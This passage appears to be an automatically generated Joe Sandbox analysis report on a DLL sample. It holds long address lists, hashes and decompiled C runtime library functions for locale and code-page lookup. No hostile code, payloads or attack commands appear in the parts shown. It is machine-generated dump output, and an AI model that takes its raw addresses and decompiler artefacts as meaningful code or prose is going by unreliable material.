0x6da6dced
0x6da6dcf5
0x6da6dcf8
0x6da6dcfe
0x6da6dcfe
0x6da6dd01
0x00000000
0x00000000
0x6da6dd03
0x6da6dd05
0x6da6dd07
0x6da6dd07
0x6da6dd0a
0x6da6dd0d
0x6da6dd0d
0x6da6dd13
0x6da6dd1a
0x6da6dd1c
0x6da6dd1d
0x6da6dd1f
0x6da6dd1f
0x6da6dd21
0x6da6dd27
0x6da6dd29
0x6da6dd2b
0x00000000
0x6da6dd2b
0x00000000
0x6da6dd29
0x6da6dcfe
0x6da6dd33
0x6da6dd33
0x6da6dd33
0x6da6dd39
0x6da6dd3c
0x6da6de25
0x00000000
0x6da6dd42
0x6da6dd42
0x00000000
0x6da6dd42
0x6da6dc4c
0x6da6dc4c
0x6da6dc4e
0x6da6dc54
0x6da6dc5c
0x6da6dc5c
0x6da6dc5f
0x6da6dc5f
0x00000000
0x6da6dc4e
0x00000000
0x6da6dd48
0x6da6dd48
0x6da6dd49
0x6da6dd49
0x00000000
0x6da6dc46
0x6da6db17
0x6da6db17
0x6da6db22
0x6da6db2e
0x6da6db3b
0x6da6db43
0x6da6db48
0x6da6db4b
0x6da6db4d
0x6da6db69
0x6da6db6b
0x00000000
0x6da6db71
0x6da6db71
0x6da6db78
0x00000000
0x6da6db7e
0x6da6db84
0x6da6db86
0x6da6db8c
0x6da6db8c
0x6da6db8e
0x6da6db8e
0x6da6db94
0x6da6db9d
0x6da6dba4
0x6da6dba7
0x6da6dba8
0x6da6dbaa
0x6da6dbaa
0x6da6dbb2
0x6da6dbb4
0x00000000
0x6da6dbba
0x6da6dbba
0x6da6dbc0
0x6da6dbc3
0x6da6de2a
0x6da6de2d
0x6da6de33
0x6da6de48
0x6da6de4d
0x6da6de50
0x6da6dbc9
0x6da6dbc9
0x6da6dbd0
0x00000000
0x6da6dbd0
0x6da6dbc3
0x6da6dbb4
0x6da6db78
0x6da6db4f
0x6da6db51
0x6da6db57
0x6da6db5d
0x6da6db5e
0x6da6dd66
0x6da6dd66
0x6da6dd6d
0x6da6dd6e
0x6da6dd6f
0x6da6dd74
0x6da6dd77
0x6da6dd77
0x6da6dd77
0x6da6db4d
0x6da6da3f
0x6da6da3f
0x6da6da45
0x6da6da47
0x6da6da7f
0x6da6da81
0x00000000
0x6da6da83
0x6da6da83
0x6da6da8a
0x00000000
0x6da6da8c
0x6da6da92
0x6da6da94
0x6da6da9a
0x6da6da9a
0x6da6da9c
0x6da6da9c
0x6da6da9e
0x6da6daa7
0x6da6daae
0x6da6dab1
0x6da6dab2
0x6da6dab4
0x6da6dab4
0x6da6dabc
0x6da6dabe
0x00000000
0x6da6dac0
0x6da6dac0
0x6da6dac6
0x6da6dac9
0x6da6dadd
0x6da6dae3
0x6da6dafc
0x6da6db01
0x6da6db04
0x00000000
0x6da6dacb
0x6da6dacb
0x6da6dad2
0x00000000
0x6da6dad2
0x6da6dac9
0x6da6dabe
0x6da6da8a
0x00000000
0x6da6da49
0x6da6da49
0x6da6da4c
0x6da6da52
0x6da6da6b
0x6da6da70
0x6da6da73
0x6da6da73
0x6da6da73
0x6da6da75
0x6da6da75
0x6da6da75
0x6da6dd79
0x6da6dd79
0x6da6dd7b
0x6da6de57
0x6da6de5e
0x6da6de65
0x6da6de78
0x6da6de7e
0x6da6de7f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6da6dd81
0x6da6dd87
0x6da6dd87
0x6da6dd8d
0x6da6dd8d
0x6da6dd99
0x00000000
0x6da6dd99
0x6da6d4b1
0x6da6d4b1
0x6da6d4b3
0x6da6d4b9
0x6da6d4bb
0x6da6d4c1
0x6da6d4c3
0x6da6d8be
0x6da6d8be
0x6da6d8c0
0x6da6d8c6
0x6da6d8cd
0x6da6d8d3
0x6da6d8d5
0x6da6d939
0x6da6d93b
0x6da6d941
0x6da6d947
0x6da6d949
0x6da6d94f
0x6da6d956
0x6da6d956
0x6da6d958
0x6da6d958
0x6da6d965
0x6da6d96c
0x6da6d972
0x6da6d975
0x6da6d976
0x6da6d97c
0x6da6d97c
0x6da6d980
0x6da6d982
0x6da6d988
0x6da6d98e
0x6da6d991
0x00000000
0x6da6d997
0x6da6d997
0x6da6d99e
0x6da6d99e
0x6da6d991
0x6da6d982
0x6da6d949
0x6da6d8d7
0x6da6d8d7
0x6da6d8d9
0x6da6d8df
0x6da6d8e5
0x00000000
0x6da6d8e5
0x6da6d8d5
0x6da6d4c9
0x6da6d4c9
0x6da6d4c9
0x6da6d4cc
0x6da6d4d0
0x6da6d4d0
0x6da6d4d1
0x6da6d4e3
0x6da6d4f0
0x6da6d4ff
0x6da6d529
0x6da6d52e
0x6da6d534
0x6da6d537
0x6da6d53d
0x6da6d53f
0x6da6d611
0x6da6d617
0x6da6d6f7
0x6da6d6fd
0x6da6d703
0x6da6d703
0x6da6d703
0x6da6d706
0x6da6d708
0x6da6d708
0x6da6d70e
0x6da6d714
0x6da6d716
0x6da6d732
0x6da6d73e
0x6da6d744
0x6da6d74a
0x6da6d718
0x6da6d71e
0x6da6d72a
0x6da6d72a
0x6da6d750
0x6da6d752
0x6da6d754
0x6da6d75a
0x6da6d75c
0x6da6d874
0x6da6d874
0x6da6d87a
0x6da6d87f
0x6da6d87f
0x6da6d882
0x6da6d883
0x00000000
0x6da6d762
0x6da6d762
0x6da6d762
0x6da6d766
0x6da6d786
0x6da6d788
0x6da6d78a
0x6da6d790
0x6da6d796
0x6da6d79c
0x6da6d7a2
0x6da6d7a4
0x6da6d7a4
0x6da6d7a7
0x00000000
0x00000000
0x6da6d7a9
0x6da6d7ab
0x6da6d7ad
0x6da6d7b5
0x6da6d7b8
0x6da6d7b8
0x6da6d7ba
0x6da6d7ba
0x6da6d7c6
0x6da6d7c9
0x6da6d7cf
0x6da6d7df
0x6da6d7e8
0x6da6d7ef
0x6da6d7f5
0x6da6d7f8
0x6da6d7f9
0x6da6d7ff
0x6da6d800
0x6da6d806
0x6da6d80c
0x00000000
0x00000000
0x00000000
0x6da6d80c
0x6da6d80e
0x6da6d810
0x6da6d818
0x6da6d81b
0x6da6d821
0x6da6d821
0x6da6d824
0x00000000
0x00000000
0x6da6d826
0x6da6d828
0x6da6d82a
0x6da6d82a
0x6da6d82d
0x6da6d830
0x6da6d830
0x6da6d836
0x6da6d83d
0x6da6d83f
0x6da6d840
0x6da6d842
0x6da6d842
0x6da6d844
0x6da6d84a
0x6da6d84c
0x6da6d84e
0x00000000
0x6da6d84e
0x00000000
0x6da6d84c
0x6da6d821
0x6da6d856
0x6da6d856
0x6da6d856
0x6da6d85c
0x6da6d85f
0x6da6d8e8
0x6da6d8ea
0x6da6d8ef
0x6da6d8f5
0x6da6d8fb
0x6da6d8fc
0x00000000
0x6da6d865
0x6da6d865
0x00000000
0x6da6d865
0x6da6d768
0x6da6d768
0x6da6d76a
0x6da6d770
0x6da6d778
0x6da6d778
0x6da6d77b
0x6da6d77b
0x00000000
0x6da6d76a
0x00000000
0x6da6d86b
0x6da6d86b
0x6da6d86c
0x6da6d86c
0x00000000
0x6da6d762
0x6da6d61d
0x6da6d61d
0x6da6d628
0x6da6d634
0x6da6d641
0x6da6d649
0x6da6d64e
0x6da6d651
0x6da6d653
0x6da6d66f
0x6da6d671
0x00000000
0x6da6d677
0x6da6d677
0x6da6d67e
0x00000000
0x6da6d684
0x6da6d68a
0x6da6d68c
0x6da6d692
0x6da6d692
0x6da6d694
0x6da6d694
0x6da6d69a
0x6da6d6a3
0x6da6d6aa
0x6da6d6ad
0x6da6d6ae
0x6da6d6b0
0x6da6d6b0
0x6da6d6b8
0x6da6d6ba
0x00000000
0x6da6d6c0
0x6da6d6c0
0x6da6d6c6
0x6da6d6c9
0x6da6d6df
0x6da6d6e5
0x6da6d6eb
0x6da6d6ec
0x6da6d902
0x6da6d902
0x6da6d909
0x6da6d90a
0x6da6d90b
0x6da6d910
0x6da6d913
0x6da6d6cb
0x6da6d6cb
0x6da6d6d2
0x00000000
0x6da6d6d2
0x6da6d6c9
0x6da6d6ba
0x6da6d67e
0x6da6d655
0x6da6d657
0x6da6d65d
0x6da6d663
0x6da6d664
0x6da6d889
0x6da6d889
0x6da6d890
0x6da6d891
0x6da6d892
0x6da6d897
0x6da6d89a
0x6da6d89a
0x6da6d89a
0x6da6d653
0x6da6d545
0x6da6d545
0x6da6d54b
0x6da6d54d
0x6da6d585
0x6da6d587
0x00000000
0x6da6d589
0x6da6d589
0x6da6d590
0x00000000
0x6da6d592
0x6da6d598
0x6da6d59a
0x6da6d5a0
0x6da6d5a0
0x6da6d5a2
0x6da6d5a2
0x6da6d5a4
0x6da6d5ad
0x6da6d5b4
0x6da6d5b7
0x6da6d5b8
0x6da6d5ba
0x6da6d5ba
0x6da6d5c2
0x6da6d5c4
0x00000000
0x6da6d5c6
0x6da6d5c6
0x6da6d5cc
0x6da6d5cf
0x6da6d5e3
0x6da6d5e9
0x6da6d602
0x6da6d607
0x6da6d60a
0x00000000
0x6da6d5d1
0x6da6d5d1
0x6da6d5d8
0x00000000
0x6da6d5d8
0x6da6d5cf
0x6da6d5c4
0x6da6d590
0x00000000
0x6da6d54f
0x6da6d54f
0x6da6d552
0x6da6d558
0x6da6d571
0x6da6d576
0x6da6d579
0x6da6d579
0x6da6d579
0x6da6d57b
0x6da6d57b
0x6da6d57b
0x6da6d89c
0x6da6d89c
0x6da6d89e
0x6da6d917
0x6da6d91e
0x6da6d91e
0x6da6d91e
0x6da6d925
0x6da6d927
0x6da6d92d
0x6da6d92e
0x6da6de85
0x6da6de85
0x6da6de86
0x6da6de87
0x6da6de8c
0x00000000
0x00000000
0x00000000
0x00000000
0x6da6d8a0
0x6da6d8a6
0x6da6d8a6
0x6da6d8ac
0x6da6d8ac
0x6da6d8b8
0x00000000
0x6da6d8b8
0x6da6d4c3
0x6da6de8f
0x6da6de8f
0x6da6de95
0x6da6de9b
0x6da6dea1
0x6da6dea3
0x6da6dea5
0x6da6deac
0x6da6deac
0x6da6deae
0x6da6deae
0x6da6deb7
0x6da6deb8
0x6da6dec0
0x6da6dec7
0x6da6deca
0x6da6decb
0x6da6ded1
0x6da6ded1
0x6da6ded5
0x6da6dedb
0x6da6dedd
0x6da6dedf
0x6da6dee5
0x6da6dee8
0x6da6def9
0x6da6defc
0x6da6df02
0x6da6df17
0x6da6df1c
0x6da6deea
0x6da6deea
0x6da6def1
0x6da6def1
0x6da6dee8
0x6da6dedd
0x6da6df2d
0x6da6df34
0x6da6df3c
0x6da6df3d
0x6da6df3f
0x6da6e0a9
0x6da6e0ab
0x6da6e0bb
0x6da6e0be
0x6da6e0c0
0x00000000
0x6da6e0ad
0x6da6e0b3
0x00000000
0x6da6e0b3
0x00000000
0x6da6df45
0x6da6df45
0x6da6df4b
0x6da6df4e
0x6da6df54
0x6da6df57
0x6da6df5d
0x6da6df63
0x6da6df65
0x6da6df67
0x6da6df69
0x6da6df69
0x6da6df6b
0x6da6df6b
0x6da6df78
0x6da6df7f
0x6da6df82
0x6da6df83
0x6da6df85
0x6da6df86
0x6da6df86
0x6da6df8e
0x6da6df94
0x6da6df96
0x6da6df9c
0x6da6df9e
0x6da6dfa4
0x6da6dfa7
0x6da6e081
0x6da6e087
0x6da6e09c
0x6da6e0a1
0x6da6dfad
0x6da6dfb3
0x6da6dfba
0x6da6dfba
0x6da6dfba
0x6da6dfba
0x6da6dfa7
0x6da6dfc0
0x6da6dfc0
0x6da6dfc6
0x6da6dfc6
0x6da6dfc6
0x6da6dfcc
0x6da6dfd2
0x6da6dfd5
0x6da6dfdb
0x6da6dfdd
0x6da6dfdf
0x6da6dfe5
0x6da6dfe7
0x6da6dfeb
0x6da6dfed
0x6da6dfed
0x6da6dfed
0x6da6dfeb
0x6da6dfe5
0x6da6dff2
0x6da6dff3
0x6da6dff5
0x6da6dff7
0x6da6dff7
0x6da6dff9
0x6da6dffb
0x6da6dffd
0x6da6e003
0x6da6e009
0x6da6e00b
0x6da6e011
0x6da6e011
0x6da6e017
0x6da6e01d
0x6da6e01f
0x00000000
0x00000000
0x6da6e025
0x6da6e027
0x6da6e027
0x6da6e029
0x6da6e029
0x6da6e035
0x6da6e039
0x6da6e040
0x6da6e043
0x6da6e044
0x6da6e046
0x6da6e046
0x6da6e04e
0x6da6e054
0x6da6e056
0x6da6e05c
0x6da6e062
0x6da6e068
0x6da6e06b
0x6da6e0cb
0x6da6e0ce
0x6da6e0d4
0x6da6e0e9
0x6da6e0ee
0x6da6e06d
0x6da6e06f
0x6da6e076
0x6da6e076
0x6da6e06b
0x6da6e0ff
0x6da6e10c
0x6da6e116
0x6da6e116
0x6da6e118
0x6da6e120
0x6da6e126
0x6da6e129
0x6da6e12f
0x6da6e131
0x6da6e142
0x00000000
0x6da6e133
0x6da6e133
0x6da6e136
0x6da6e145
0x6da6e145
0x6da6e138
0x6da6e138
0x6da6e13a
0x6da6e13a
0x6da6e136
0x6da6e14b
0x6da6e14c
0x6da6e152
0x6da6e155
0x6da6e155
0x6da6e15d
0x6da6e160
0x6da6e164
0x6da6e164
0x6da6e165
0x6da6e167
0x6da6e16d
0x6da6e173
0x00000000
0x00000000
0x00000000
0x6da6e173
0x6da6e011
0x6da6e179
0x6da6e179
0x6da6e17c
0x6da6e183
0x00000000
0x6da6e185
0x6da6e185
0x6da6e187
0x00000000
0x00000000
0x6da6e187
0x00000000
0x6da6cd6e
0x6da6cd6e
0x6da6cd74
0x6da6cd77
0x6da6cd77
0x6da6cd7a
0x6da6cdca
0x6da6cdd2
0x6da6cdd4
0x00000000
0x6da6cdda
0x6da6e189
0x6da6e189
0x6da6e189
0x00000000
0x6da6e189
0x6da6cd7c
0x6da6cd7c
0x6da6cd7c
0x6da6cd7f
0x6da6cd99
0x00000000
0x6da6cd81
0x6da6cd81
0x6da6cd81
0x6da6cd84
0x6da6cd92
0x00000000
0x6da6cd86
0x6da6cd86
0x6da6cd89
0x00000000
0x6da6cd8b
0x6da6cd8b
0x00000000
0x6da6cd8b
0x6da6cd89
0x6da6cd84
0x6da6cd7f
0x6da6cd7a
0x6da6cd34
0x6da6cd39
0x6da6cd41
0x6da6cd55
0x6da6cd5a
0x6da6cd9e
0x6da6cd9e
0x6da6cda1
0x6da6cdb1
0x6da6e1b2
0x6da6e1b4
0x6da6e1b5
0x6da6e1b6
0x6da6e1b7
0x6da6e1b8
0x6da6e1b9
0x6da6e1be
0x6da6e1c1
0x6da6e1c4
0x6da6e1c7
0x6da6e1c9
0x6da6e1da
0x6da6e1dd
0x6da6e1df
0x6da6e1e5
0x6da6e1eb
0x6da6e1f1
0x6da6e1f2
0x6da6e1f3
0x6da6e1f9
0x6da6e202
0x6da6e208
0x6da6e220
0x6da6e226
0x00000000
0x6da6e228
0x6da6e228
0x6da6e22e
0x00000000
0x6da6e230
0x6da6e230
0x6da6e232
0x00000000
0x6da6e232
0x6da6e22e
0x6da6e20a
0x6da6e20a
0x6da6e210
0x6da6e21a
0x6da6e21a
0x6da6e21c
0x6da6e234
0x6da6e234
0x00000000
0x6da6e212
0x6da6e212
0x6da6e218
0x6da6e25e
0x6da6e264
0x00000000
0x00000000
0x00000000
0x6da6e218
0x6da6e210
0x6da6e1fb
0x6da6e1fd
0x6da6e235
0x6da6e235
0x6da6e236
0x6da6e238
0x6da6e238
0x6da6e23a
0x6da6e241
0x6da6e244
0x6da6e244
0x6da6e244
0x6da6e252
0x6da6e254
0x6da6e25b
0x6da6e26e
0x6da6e1ed
0x6da6e1ed
0x00000000
0x6da6e1ed
0x6da6e1e1
0x6da6e1e1
0x00000000
0x6da6e1e1
0x6da6e1cb
0x6da6e1cb
0x6da6e1cb
0x6da6e1cd
0x6da6e1cd
0x6da6e1d0
0x6da6e1d2
0x6da6e1d5
0x6da6e1d7
0x6da6e1d9
0x6da6e1d9
0x6da6cdb7
0x6da6e18b
0x6da6e18b
0x6da6e192
0x6da6e193
0x6da6e194
0x6da6e19d
0x6da6e1a2
0x6da6e1aa
0x6da6e1b1
0x6da6e1b1
0x00000000
0x00000000
0x00000000
0x6da6cd41

APIs

__floor_pentium4.LIBCMT ref: 6DA6CE6A

Strings

1#QNAN, xrefs: 6DA6CD99
1#INF, xrefs: 6DA6CDBC
1#IND, xrefs: 6DA6CD8B
1#SNAN, xrefs: 6DA6CD92

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f9e808f825b58162ad8bb334d9b95082ca9d7b39e00cd6752c9832293e8cc431
Instruction ID: 739d23ed148af8d0736f2b4cceab643353672ded8eb4116e3ea5dd0799d0d939
Opcode Fuzzy Hash: f9e808f825b58162ad8bb334d9b95082ca9d7b39e00cd6752c9832293e8cc431
Instruction Fuzzy Hash: ECD22476E08269CBDF658E28CD407EAB7B5EB85344F2445EAD40DE7240E778AAC1CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C73D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E6DA6C73D(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6DA62774(_t27, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x6da6c743
0x6da6c74a
0x6da6c7ee
0x6da6c807
0x6da6c80d
0x6da6c812
0x6da6c814
0x6da6c814
0x6da6c81a
0x6da6c81d
0x6da6c81d
0x6da6c809
0x6da6c809
0x00000000
0x6da6c809
0x6da6c750
0x6da6c755
0x00000000
0x00000000
0x6da6c75b
0x6da6c760
0x6da6c762
0x6da6c762
0x6da6c768
0x00000000
0x00000000
0x6da6c76d
0x6da6c784
0x6da6c784
0x6da6c78d
0x6da6c78f
0x00000000
0x00000000
0x6da6c791
0x6da6c796
0x6da6c798
0x6da6c798
0x6da6c79e
0x00000000
0x00000000
0x6da6c7a3
0x6da6c7c1
0x6da6c7c3
0x6da6c7e6
0x00000000
0x6da6c7eb
0x6da6c7de
0x00000000
0x00000000
0x6da6c7e0
0x00000000
0x6da6c7e0
0x6da6c7a5
0x6da6c7ad
0x00000000
0x00000000
0x6da6c7af
0x6da6c7b2
0x6da6c7b8
0x00000000
0x00000000
0x00000000
0x6da6c7ba
0x6da6c7bc
0x6da6c7be
0x00000000
0x6da6c7be
0x6da6c76f
0x6da6c777
0x00000000
0x00000000
0x6da6c779
0x6da6c77c
0x6da6c782
0x00000000
0x00000000
0x00000000
0x6da6c782
0x6da6c788
0x6da6c78a
0x00000000

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,6DA6CA5B,00000002,00000000,?,?,?,6DA6CA5B,?,00000000), ref: 6DA6C7D6
GetLocaleInfoW.KERNEL32(00000000,20001004,6DA6CA5B,00000002,00000000,?,?,?,6DA6CA5B,?,00000000), ref: 6DA6C7FF
GetACP.KERNEL32(?,?,6DA6CA5B,?,00000000), ref: 6DA6C814

Strings

OCP, xrefs: 6DA6C791
ACP, xrefs: 6DA6C75B

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: a502c2256681a21b8699c83f74d646ab336b6d80012328d3614f7234d75a4945
Instruction ID: b1a20099a8a7244a01e8ac927f76d0e41febd1dafd66aaab6e41f1552d3e6097
Opcode Fuzzy Hash: a502c2256681a21b8699c83f74d646ab336b6d80012328d3614f7234d75a4945
Instruction Fuzzy Hash: 4E21B33A60C283EADF258F64C900A977AB6BF45F54B1AC434E906C7100E732DAC1C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C912 Relevance: 7.7, APIs: 5, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E6DA6C912(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				signed short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				signed short _t48;
				int _t49;
				void* _t53;
				signed short* _t57;
				signed short _t70;
				intOrPtr _t73;
				void* _t75;
				signed short _t76;
				intOrPtr _t83;
				short* _t86;
				signed short _t89;
				signed short* _t99;
				void* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x6da83014; // 0xa0d58914
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E6DA62BDC(__ecx, __edx, _t101) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6DA62BDC(__ecx, __edx, _t101);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x6da78574; // 0x17
					E6DA6C8B1(_t89, 0, 0x6da78460, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					if(_t48 == 0 ||  *_t48 == _t97) {
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
					} else {
						E6DA6C250(_t89, _t97,  &_v20);
						_pop(_t89);
					}
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0 ||  *_t70 == _t97) {
						E6DA6C336(_t89, _t97,  &_v20);
					} else {
						E6DA6C29B(_t89, _t97,  &_v20);
					}
					_pop(_t89);
					if(_v20 != 0) {
						_t100 = 0;
						goto L25;
					} else {
						_t73 =  *0x6da7845c; // 0x41
						_t75 = E6DA6C8B1(_t89, _t97, 0x6da78150, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t101 = E6DA6C73D(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
									goto L22;
								} else {
									_t57 = _v28;
									if(_t57 != 0) {
										 *_t57 = _t101;
									}
									E6DA66910(_v16,  &(_v24[0x128]), 0x55, _t100);
									if(_t86 == 0) {
										L34:
										_t53 = 1;
										L23:
										return E6DA59B91(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
									} else {
										_t33 =  &(_t86[0x90]); // 0xd0
										E6DA66910(_v16, _t33, 0x55, _t100);
										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
											goto L22;
										}
										_t36 =  &(_t86[0x40]); // 0x30
										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
											goto L22;
										}
										_t38 =  &(_t86[0x80]); // 0xb0
										E6DA70752(_t38, _t101, _t38, 0x10, 0xa);
										goto L34;
									}
								}
							}
							L22:
							_t53 = 0;
							goto L23;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0 ||  *_t76 == 0) {
							E6DA6C336(_t89, _t97,  &_v20);
						} else {
							E6DA6C29B(_t89, _t97,  &_v20);
						}
						_pop(_t89);
						goto L21;
					}
				}
			}

0x6da6c91a
0x6da6c921
0x6da6c928
0x6da6c92c
0x6da6c930
0x6da6c93e
0x6da6c943
0x6da6c944
0x6da6c945
0x6da6c946
0x6da6c94e
0x6da6c950
0x6da6c956
0x6da6c95c
0x6da6c95f
0x6da6c961
0x6da6c964
0x6da6c968
0x6da6c96f
0x6da6c97c
0x6da6c981
0x6da6c984
0x6da6c987
0x6da6c987
0x6da6c989
0x6da6c98c
0x6da6c990
0x6da6ca00
0x6da6ca04
0x6da6ca17
0x6da6ca1e
0x6da6ca24
0x6da6ca27
0x6da6ca0b
0x6da6ca0f
0x6da6ca14
0x6da6ca14
0x00000000
0x6da6c997
0x6da6c997
0x6da6c99b
0x6da6c9b1
0x6da6c9a2
0x6da6c9a6
0x6da6c9a6
0x6da6c9ba
0x6da6c9bb
0x6da6ca43
0x00000000
0x6da6c9c1
0x6da6c9c1
0x6da6c9d0
0x6da6c9d5
0x6da6c9da
0x6da6ca2a
0x6da6ca2a
0x6da6ca2c
0x6da6ca30
0x6da6ca45
0x6da6ca51
0x6da6ca5b
0x6da6ca61
0x00000000
0x6da6ca80
0x6da6ca80
0x6da6ca85
0x6da6ca87
0x6da6ca87
0x6da6ca98
0x6da6ca9f
0x6da6caff
0x6da6cb01
0x6da6ca34
0x6da6ca42
0x6da6caa1
0x6da6caa4
0x6da6caae
0x6da6cac6
0x00000000
0x00000000
0x6da6cace
0x6da6cae5
0x00000000
0x00000000
0x6da6caef
0x6da6caf7
0x00000000
0x6da6cafc
0x6da6ca9f
0x6da6ca61
0x6da6ca32
0x6da6ca32
0x00000000
0x6da6ca32
0x6da6c9dc
0x6da6c9de
0x6da6c9e2
0x6da6c9f8
0x6da6c9e9
0x6da6c9ed
0x6da6c9ed
0x6da6c9fd
0x00000000
0x6da6c9fd
0x6da6c9bb

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6DA6CA1E
IsValidCodePage.KERNEL32(00000000), ref: 6DA6CA67
IsValidLocale.KERNEL32(?,00000001), ref: 6DA6CA76
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6DA6CABE
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6DA6CADD

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
